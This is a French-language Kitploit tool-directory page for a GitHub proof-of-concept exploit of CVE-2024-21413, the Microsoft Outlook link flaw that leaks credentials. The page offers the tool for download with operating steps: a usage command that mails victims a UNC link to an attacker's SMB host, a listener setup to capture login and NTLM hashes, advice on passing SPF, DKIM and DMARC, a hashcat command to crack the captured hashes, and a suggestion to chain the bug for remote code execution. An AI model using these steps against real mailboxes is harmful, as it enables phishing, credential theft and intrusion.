Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-21413 — Microsoft Outlook Information Disclosure Vulnerability (fuite de password hash) - Expect Script POC | Kitploit
Outils/GitHubGitHub/duy-31/cve-2024-21413
Cassage de Mots de PasseOutils de PhishingAnalyse des VulnérabilitésExploitationApprentissage et ÉducationSécurité des Emails
GitHubduy-31/cve-2024-21413

CVE-2024-21413

Microsoft Outlook Information Disclosure Vulnerability (fuite de password hash) - Expect Script POC

Voir le dépôt
157335il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-21413 - Script POC d'exploitation

Fuite d'identifiants Microsoft Outlook et vulnérabilité d'exécution de code à distance lorsqu'elle est chaînée avec CVE-2023-21716 (via le panneau d'aperçu) CVSS:3.1 9.8 / 8.5

Outlook devrait vous avertir du risque lié à l'ouverture d'un lien externe => mais ce n'est pas le cas !

image

utilisation : ./cve-2024-21413.sh mx.fqdn port expéditeur destinataire url

./cve-2024-21413.sh mail.mydomain.com 25 [email protected] [email protected] "\\xx.xx.xx.xx\test\duy31.txt"

remarques : chmod +x cve-2024-21413.sh

nécessite l'application expect & nécessite une adresse IP d'expéditeur légitime et une adresse email d'expéditeur (pour passer SPF, DKIM, DMARC)


  • Lancez d'abord un écouteur SMB comme ceci

image

  • Exécutez le POC

image

  • et attendez l'email & dans la fenêtre d'aperçu cliquez sur le lien

image

  • vous devriez alors récupérer le login et le hash de la personne qui a cliqué sur le lien (sans l'invite d'avertissement sur les versions concernées d'Outlook)

image

  • Vous pouvez ensuite essayer de casser le mot de passe avec hashcat. Copiez simplement toute la ligne avec le nom de login dans un fichier et exécutez hashcat avec le module 5600

hashcat -a 0 -m 5600 hash.txt rockyou.txt -o cracked.txt -O

  • Vous pouvez chaîner cette CVE avec CVE-2023-21716 pour obtenir une RCE !!!

Kudos : [https://research.checkpoint.com/2024/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture/]

Solution de contournement/Correctif : [https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413]


plus d'infos sur moi ;) https://www.linkedin.com/in/duy-huan-bui/

⚠️ Avertissement : IMPORTANT : Ce script est fourni uniquement à des fins éducatives, de tests éthiques et d'utilisation légale. Ne l'utilisez sur aucun système ou réseau sans autorisation explicite. L'accès non autorisé à des systèmes informatiques et à des réseaux est illégal, et les utilisateurs pris en flagrant délit d'activités non autorisées sont passibles de poursuites judiciaires. L'auteur n'est PAS responsable des dommages causés par une mauvaise utilisation de ce script.

Télécharger l’outil